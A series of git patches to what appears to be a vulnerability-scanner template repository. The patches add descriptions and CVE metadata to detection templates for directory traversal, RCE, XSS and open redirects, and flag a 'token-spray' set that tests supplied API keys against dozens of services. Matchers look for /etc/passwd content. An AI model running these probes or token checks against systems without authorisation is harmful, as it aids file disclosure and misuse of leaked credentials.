a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -4,6 +4,7 @@ info: name: GeoVision Geowebserver 5.3.3 - XSS author: madrobot severity: medium + description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,xss From d803f919717711d5f2c0ca52d4f43e222cc17469 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:34:15 +0300 Subject: [PATCH 2928/4083] Add description --- vulnerabilities/other/hasura-graphql-psql-exec.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 98bcfbc283..00d5756dd4 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -4,6 +4,7 @@ info: author: Udyz name: Hasura GraphQL Engine - postgresql query exec severity: critical + description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint. reference: https://www.exploit-db.com/exploits/49802 tags: hasura,rce From 4532646b447bff4a40457c3b00506da205fe6ead Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:35:40 +0300 Subject: [PATCH 2929/4083] Description --- vulnerabilities/other/hiboss-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 6765dc8577..10df9f9c37 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -4,6 +4,7 @@ info: name: Hiboss RCE author: pikpikcu severity: critical + description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 tags: hiboss,rce From a313e27f6e3e00285a13543f0c4bf9e132789d20 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 19:31:57 +0530 Subject: [PATCH 2930/4083] misc update --- vulnerabilities/other/bitrix-open-redirect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 4e13035c30..b56424baca 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -4,13 +4,12 @@ info: name: Bitrix Open URL redirect detection author: pikpikcu severity: low - description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. + description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix requests: - method: GET - path: - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' @@ -34,7 +33,7 @@ requests: part: header - type: status + condition: or status: - 302 - - 301 - condition: or + - 301 \ No newline at end of file From adfbed9d512fd2003972872bb66d89c00b480858 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 19:50:43 +0530 Subject: [PATCH 2931/4083] lint fix --- vulnerabilities/other/ecoa-building-lfi.yaml | 2 +- vulnerabilities/other/karel-ip-phone-lfi.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/ecoa-building-lfi.yaml b/vulnerabilities/other/ecoa-building-lfi.yaml index 16995240be..d6bb3d77be 100644 --- a/vulnerabilities/other/ecoa-building-lfi.yaml +++ b/vulnerabilities/other/ecoa-building-lfi.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: high description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device - reference: + reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html tags: ecoa,lfi,cve-2021-41291 diff --git a/vulnerabilities/other/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml index ad51213f64..d2ca25b0c4 100644 --- a/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -4,7 +4,7 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high - description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. + description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon From f9f4e3327e8a6c0c414797852f9efdf2e06cf65f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 20:05:25 +0530 Subject: [PATCH 2932/4083] moving files around --- .../2021/CVE-2021-41293.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/other/ecoa-building-automation-lfd.yaml => cves/2021/CVE-2021-41293.yaml (90%) diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/cves/2021/CVE-2021-41293.yaml similarity index 90% rename from vulnerabilities/other/ecoa-building-automation-lfd.yaml rename to cves/2021/CVE-2021-41293.yaml index 0bb7b93633..3aec5529e7 100644 --- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml +++ b/cves/2021/CVE-2021-41293.yaml @@ -1,4 +1,5 @@ -id: ecoa-building-automation-lfd +id: CVE-2021-41293 + info: name: ECOA Building Automation System - LFD author: 0x_Akoko @@ -7,7 +8,7 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html - tags: ecoa,lfi,cve-2021-41293 + tags: cve,cve2021,ecoa,lfi requests: - raw: @@ -23,7 +24,6 @@ requests: - type: regex regex: - "root:.*:0:0" - condition: and - type: status status: From e8a32dbbf7372c0cdf6336958b4ed1584825f41a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Oct 2021 14:37:07 +0000 Subject: [PATCH 2933/4083] Auto Generated CVE annotations [Thu Oct 14 14:37:07 UTC 2021] :robot: --- cves/2021/CVE-2021-41293.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml index 3aec5529e7..4a4c48e176 100644 --- a/cves/2021/CVE-2021-41293.yaml +++ b/cves/2021/CVE-2021-41293.yaml @@ -9,6 +9,11 @@ info: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html tags: cve,cve2021,ecoa,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41293 + cwe-id: CWE-22 requests: - raw: From aad97c084c82c9a859f4c5f125b500b12bc042ee Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 20:08:44 +0530 Subject: [PATCH 2934/4083] misc update --- .../ecoa-building-lfi.yaml => cves/2021/CVE-2021-41291.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) rename vulnerabilities/other/ecoa-building-lfi.yaml => cves/2021/CVE-2021-41291.yaml (91%) diff --git a/vulnerabilities/other/ecoa-building-lfi.yaml b/cves/2021/CVE-2021-41291.yaml similarity index 91% rename from vulnerabilities/other/ecoa-building-lfi.yaml rename to cves/2021/CVE-2021-41291.yaml index d6bb3d77be..e95362253b 100644 --- a/vulnerabilities/other/ecoa-building-lfi.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -1,4 +1,4 @@ -id: ecoa-building-lfi +id: CVE-2021-41291 info: name: ECOA Building Automation System - Directory Traversal Content Disclosure @@ -19,5 +19,4 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" - part: body + - "root:.*:0:0:" \ No newline at end of file From b025811dd2fbe919aafb9dea254c9af0b0c999d5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Oct 2021 14:40:51 +0000 Subject: [PATCH 2935/4083] Auto Generated CVE annotations [Thu Oct 14 14:40:51 UTC 2021] :robot: --- cves/2021/CVE-2021-41291.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml index e95362253b..f894fbdde4 100644 --- a/cves/2021/CVE-2021-41291.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -9,6 +9,11 @@ info: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html tags: ecoa,lfi,cve-2021-41291 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41291 + cwe-id: CWE-22 requests: - raw: From ac9cbb54b0480e478ac54482e9787d6ff8453048 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 20:10:59 +0530 Subject: [PATCH 2936/4083] tags update --- cves/2021/CVE-2021-41291.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml index e95362253b..4439265ffb 100644 --- a/cves/2021/CVE-2021-41291.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - tags: ecoa,lfi,cve-2021-41291 + tags: cve,cve2021,ecoa,lfi requests: - raw: From 5e1a315645cc7c57c550fde587857801f7e3e676 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 14 Oct 2021 13:08:33 -0300 Subject: [PATCH 2937/4083] Update aviatrix-detect.yaml - Cases where title is Aviatrix Cloud Controller (https://35.154.250.26/) - Cases where title is hidden but is possible to read the favicon. --- technologies/aviatrix-detect.yaml | 25 +++++++++++++++---------- 1 file changed, 15 insertions(+), 10 deletions(-) diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml index a9640dd968..dde084ebea 100644 --- a/technologies/aviatrix-detect.yaml +++ b/technologies/aviatrix-detect.yaml @@ -2,7 +2,7 @@ id: aviatrix-detect info: name: Aviatrix Detect - author: pikpikcu + author: pikpikcu, philippedelteil severity: info tags: tech,aviatrix @@ -10,15 +10,20 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: + - type: dsl + name: "title" + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' + condition: and - - type: word - part: body - words: - - "Aviatrix Controller" - - - type: status - status: - - 200 + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" From 10ecdc806a453f925710374f4d704bff354da601 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 23:43:45 +0530 Subject: [PATCH 2938/4083] Additional matcher --- token-spray/iterable.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index a8bb4d5847..0c1f84d566 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -20,3 +20,4 @@ requests: negative: true words: - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve From 5b8e87ac0c6b82af7ca98e9ed8a6ba88181de01d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 23:56:45 +0530 Subject: [PATCH 2939/4083] Adding self contained template identifier --- .nuclei-ignore | 5 ----- token-spray/asana.yaml | 1 + token-spray/bingmaps.yaml | 1 + token-spray/bitly.yaml | 1 + token-spray/buildkite.yaml | 1 + token-spray/buttercms.yaml | 1 + token-spray/calendly.yaml | 1 + token-spray/circleci.yaml | 1 + token-spray/deviantart.yaml | 1 + token-spray/dropbox.yaml | 1 + token-spray/github.yaml | 1 + token-spray/google-autocomplete.yaml | 1 + token-spray/google-customsearch.yaml | 1 + token-spray/google-directions.yaml | 1 + token-spray/google-elevation.yaml | 1 + token-spray/google-fcm.yaml | 1 + token-spray/google-findplacefromtext.yaml | 1 + token-spray/google-gedistancematrix.yaml | 1 + token-spray/google-geocode.yaml | 1 + token-spray/google-geolocation.yaml | 1 + token-spray/google-mapsembed.yaml | 1 + token-spray/google-mapsembedadvanced.yaml | 1 + token-spray/google-nearbysearch.yaml | 1 + token-spray/google-nearestroads.yaml | 1 + token-spray/google-placedetails.yaml | 1 + token-spray/google-placesphoto.yaml | 1 + token-spray/google-playablelocations.yaml | 1 + token-spray/google-routetotraveled.yaml | 1 + token-spray/google-speedlimit.yaml | 1 + token-spray/google-staticmaps.yaml | 1 + token-spray/google-streetview.yaml | 1 + token-spray/google-timezone.yaml | 1 + token-spray/googlet-extsearchplaces.yaml | 1 + token-spray/heroku.yaml | 1 + token-spray/hubspot.yaml | 1 + token-spray/instagram.yaml | 1 + token-spray/ipstack.yaml | 1 + token-spray/iterable.yaml | 1 + token-spray/jumpcloud.yaml | 1 + token-spray/lokalise.yaml | 1 + token-spray/loqate.yaml | 1 + token-spray/mailchimp.yaml | 1 + token-spray/mailgun.yaml | 1 + token-spray/mapbox.yaml | 1 + token-spray/nerdgraph.yaml | 1 + token-spray/npm.yaml | 1 + token-spray/openweather.yaml | 1 + token-spray/pagerduty.yaml | 1 + token-spray/pendo.yaml | 1 + token-spray/pivotaltracker.yaml | 1 + token-spray/postmark.yaml | 1 + token-spray/sendgrid.yaml | 1 + token-spray/slack.yaml | 1 + token-spray/sonarcloud.yaml | 1 + token-spray/spotify.yaml | 1 + token-spray/square.yaml | 1 + token-spray/stripe.yaml | 1 + token-spray/tinypng.yaml | 1 + token-spray/travisci.yaml | 1 + token-spray/twitter.yaml | 1 + token-spray/visualstudio.yaml | 1 + token-spray/wakatime.yaml | 1 + token-spray/weglot.yaml | 1 + token-spray/youtube.yaml | 1 + 64 files changed, 63 insertions(+), 5 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 26f85418fb..bef00b4d7a 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -14,8 +14,3 @@ tags: # files is a list of files to ignore template execution # unless asked for by the user. - -files: - - "token-spray/" - - diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml index 9282cf7a4d..08645bbe99 100644 --- a/token-spray/asana.yaml +++ b/token-spray/asana.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml index 0892d85b9f..86e6784911 100644 --- a/token-spray/bingmaps.yaml +++ b/token-spray/bingmaps.yaml @@ -12,6 +12,7 @@ requests: path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml index 57e1d5d3d4..31eea7a7e7 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/bitly.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml index 77e8e1e677..c2129bc7dd 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/buildkite.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml index 229da7b1d5..f37c091c85 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/buttercms.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml index 1d8289fb37..1f2c1f434e 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/calendly.yaml @@ -14,6 +14,7 @@ requests: headers: X-Token: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml index 281d22b656..0e1d78ca22 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/circleci.yaml @@ -12,6 +12,7 @@ requests: path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml index 403b97a349..96b90b34b1 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/deviantart.yaml @@ -13,6 +13,7 @@ requests: - "https://www.deviantart.com/api/v1/oauth2/placebo" body: "access_token={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml index 29679e2b2f..e1f7bf1625 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/dropbox.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/github.yaml b/token-spray/github.yaml index c6d1d560de..944225f0fe 100644 --- a/token-spray/github.yaml +++ b/token-spray/github.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64('user:' + token)}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml index b3c459082e..d6fee5de42 100644 --- a/token-spray/google-autocomplete.yaml +++ b/token-spray/google-autocomplete.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml index 0be1636139..0a77ff06fb 100644 --- a/token-spray/google-customsearch.yaml +++ b/token-spray/google-customsearch.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml index a6b8cea46b..483224144e 100644 --- a/token-spray/google-directions.yaml +++ b/token-spray/google-directions.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml index 480bc31fb7..a9b2e001c7 100644 --- a/token-spray/google-elevation.yaml +++ b/token-spray/google-elevation.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml index aba6f43579..ebb916fbe5 100644 --- a/token-spray/google-fcm.yaml +++ b/token-spray/google-fcm.yaml @@ -15,6 +15,7 @@ requests: Authorization: key={{token}} Content-Type: application/json + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml index dcecba34b2..0a4a93b767 100644 --- a/token-spray/google-findplacefromtext.yaml +++ b/token-spray/google-findplacefromtext.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml index 62795ea15e..5eaf5abb5d 100644 --- a/token-spray/google-gedistancematrix.yaml +++ b/token-spray/google-gedistancematrix.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml index 91826af391..21d1ea1781 100644 --- a/token-spray/google-geocode.yaml +++ b/token-spray/google-geocode.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml index 88d1ce9ffc..07684fe0e1 100644 --- a/token-spray/google-geolocation.yaml +++ b/token-spray/google-geolocation.yaml @@ -12,6 +12,7 @@ requests: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" matchers-condition: and + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml index d7b47585f1..d7d9c5e05f 100644 --- a/token-spray/google-mapsembed.yaml +++ b/token-spray/google-mapsembed.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml index 5f8e4d2721..8fd69d623d 100644 --- a/token-spray/google-mapsembedadvanced.yaml +++ b/token-spray/google-mapsembedadvanced.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml index 752d9d9814..d40f6d479c 100644 --- a/token-spray/google-nearbysearch.yaml +++ b/token-spray/google-nearbysearch.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml index e804422ff0..ab8ebf2b98 100644 --- a/token-spray/google-nearestroads.yaml +++ b/token-spray/google-nearestroads.yaml @@ -11,6 +11,7 @@ requests: path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 30ca3e6184..3a9935ba6a 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml index 82f33c2e1d..88790a68ec 100644 --- a/token-spray/google-placesphoto.yaml +++ b/token-spray/google-placesphoto.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml index 2e38d6316a..e034096bfc 100644 --- a/token-spray/google-playablelocations.yaml +++ b/token-spray/google-playablelocations.yaml @@ -11,6 +11,7 @@ requests: path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml index c97cfcee59..4efb960afd 100644 --- a/token-spray/google-routetotraveled.yaml +++ b/token-spray/google-routetotraveled.yaml @@ -11,6 +11,7 @@ requests: path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml index 5eec3d0a53..dd06969472 100644 --- a/token-spray/google-speedlimit.yaml +++ b/token-spray/google-speedlimit.yaml @@ -11,6 +11,7 @@ requests: path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml index d4a012bff2..5011053baf 100644 --- a/token-spray/google-staticmaps.yaml +++ b/token-spray/google-staticmaps.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml index 49d043391d..cc0344919f 100644 --- a/token-spray/google-streetview.yaml +++ b/token-spray/google-streetview.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml index 273101bcc9..33f8002db5 100644 --- a/token-spray/google-timezone.yaml +++ b/token-spray/google-timezone.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml index c3683703cf..29e5fcca5a 100644 --- a/token-spray/googlet-extsearchplaces.yaml +++ b/token-spray/googlet-extsearchplaces.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml index 9f08e416d5..ec76722f11 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/heroku.yaml @@ -15,6 +15,7 @@ requests: Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml index 86566864f0..b1a796d113 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/hubspot.yaml @@ -13,6 +13,7 @@ requests: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml index 289546f452..8ab1b9131d 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/instagram.yaml @@ -12,6 +12,7 @@ requests: path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml index f64daea02e..4c912bf0b7 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/ipstack.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index 0c1f84d566..a4d77e7575 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -14,6 +14,7 @@ requests: headers: Api_Key: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/jumpcloud.yaml 